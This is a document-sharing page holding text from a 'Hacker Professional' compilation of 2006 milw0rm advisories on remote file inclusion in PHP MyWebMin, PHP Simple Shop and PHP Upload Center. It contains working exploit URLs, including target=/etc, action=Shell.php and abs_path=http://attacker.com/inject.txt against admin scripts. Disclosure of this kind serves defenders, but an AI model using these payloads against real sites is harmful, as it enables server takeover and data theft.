intTypePromotion=1
zunia.vn Tuyển sinh 2024 dành cho Gen-Z zunia.vn zunia.vn
ADSENSE

Hacker Professional part 407

Chia sẻ: Angel Smile | Ngày: | Loại File: PDF | Số trang:6

60
lượt xem
6
download
 
  Download Vui lòng tải xuống để xem tài liệu đầy đủ

Tham khảo tài liệu 'hacker professional part 407', công nghệ thông tin, kỹ thuật lập trình phục vụ nhu cầu học tập, nghiên cứu và làm việc hiệu quả

Chủ đề:
Lưu

Nội dung Text: Hacker Professional part 407

  1. ####################################### +PHP MyWebMin 1.0 Remote File Include +Advisory #5 +Product HP MyWebMin +Develop: +http://www.josh.ch/joshch/php-tools/...,download.html +Vulnerable: Remote File Includes +Risk:High +Class:Remote +Discovered:by Kernel-32 +Contact: kernel-32@linuxmail.org +Homepage: http://kernel-32.blogspot.com +Greetz: BeLa ######################################## Vulnerable File:window.php $ordner = opendir("$target"); ?> and include("$target/preferences.php"); if($action != "") { include("$action.php"); ?> Examples: http://site/path/window.php?target=/etc http://site/path/home.php?target=/home http://site/path/window.php?action=Shell.php # milw0rm.com [2006-09-28]
  2. navaro(HCE) PHP Simple Shop
  3. --------------------------------------------------------------------------- Vulnerability: ~~~~~~~~~~~~~ In folder admin we found vulnerability script index.php ---------------------------index.php--------------------------------------- ....
  4. Proof Of Concept: ~~~~~~~~~~~~~~ http://target.com/[phpsimpleshop_path]/admin/index.php?abs_path=http://attacker. com/inject.txt? http://target.com/[phpsimpleshop_path]/admin/adminindex.php?abs_path=http://att acker.com/inject.txt? http://target.com/[phpsimpleshop_path]/admin/adminglobal.php?abs_path=http://at tacker.com/inject.txt? http://target.com/[phpsimpleshop_path]/admin/login.php?abs_path=http://attacker. com/inject.txt? http://target.com/[phpsimpleshop_path]/admin/menu.php?abs_path=http://attacker. com/inject.txt? http://target.com/[phpsimpleshop_path]/admin/header.php?abs_path=http://attacke r.com/inject.txt? Solution: ~~~~~~ - Sanitize variable $abs_path on affected files. Notification: ~~~~~~~~~ I've been contacting the web/software administrator to tell about this hole in his system, but instead of giving a nice response, he replied so rudely and arrogantly. I recommend not to use this product for your own sake. --------------------------------------------------------------------------- Shoutz: ~~ ~ solpot a.k.a chris, J4mbi H4ck3r thx for the hacking lesson :) ~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous ~ bius, lapets, ghoz, t4mbun_hacker, NpR, h4ntu, thama ~ newbie_hacker@yahoogroups.com, jasakom_perjuangan@yahoogroups.com ~ Solpotcrew Comunity , #jambihackerlink #e-c-h-o @irc.dal.net ------------------------------------------------------------------------ --- Contact:
  5. ~~~ matdhule[at]gmail[dot]com -------------------------------- [ EOF ]---------------------------------- # milw0rm.com [2006-08-07] vns3curity(HCE) PHP Upload Center 2.0 (activate.php) File Include Vulnerabilities Code: * Name = PHP Upload Center v2.0 ; * Class = Remote/Local File Inclusion ; * Download = http://skrypty.webpc.pl/pobierz.php?id=58 ; * Found by = GregStar (gregstar[at]c4f[dot]pl) (http://c4f.pl) ; ---------------------------------------------------------------------------------------------------- --------------------- Vulnerable Code in activate.php line 66-70 ... if (!isset($language)) $language=$dft_language; if ($language=="") $language=$dft_language; require("include/${language}.php");
ADSENSE

CÓ THỂ BẠN MUỐN DOWNLOAD

 

Đồng bộ tài khoản
2=>2